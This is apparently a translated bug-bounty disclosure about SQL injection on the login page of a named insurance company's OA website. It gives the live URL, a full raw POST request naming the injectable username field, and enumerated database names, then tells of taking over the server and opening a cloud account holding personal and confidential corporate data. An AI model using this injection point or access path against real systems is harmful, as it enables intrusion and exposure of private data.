A website vulnerability in Great Wall insurance (resulting in leakage of a large amount of confidential information)
Similar to previous site vulnerabilities, but not in the same location, not repeated vulnerabilities ~~~
Http://oa.ccib.com.cn/login.asp
Post injection on the login page:
POST /LoginType.asp HTTP/1.1Host: oa.ccib.com.cnContent-Length: 70Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://oa.ccib.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) hrome/47.0.2526.106 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://oa.ccib.com.cn/login.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.8Cookie: ASPSESSIONIDASBSDCBR=DDIJGEODBIEDENPJDPPBLKPMDigest=&urlFrom=&username=admin&password=admin&submit1=+%B5%C7+%C2%BC+
Username Injection
Six databases: not used
available databases [6]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
It seems you can win the server directly.
We can see that the master station is also on this server, so the master station also won
There was no data in the database, but an unexpected error occurred:
When I opened my computer, I found that Baidu cloud exists. By default, I opened it directly:
In addition to the user's personal information, all of them are confidential information of the enterprise.
So far, no data is obtained.
Solution:
20rank ~~~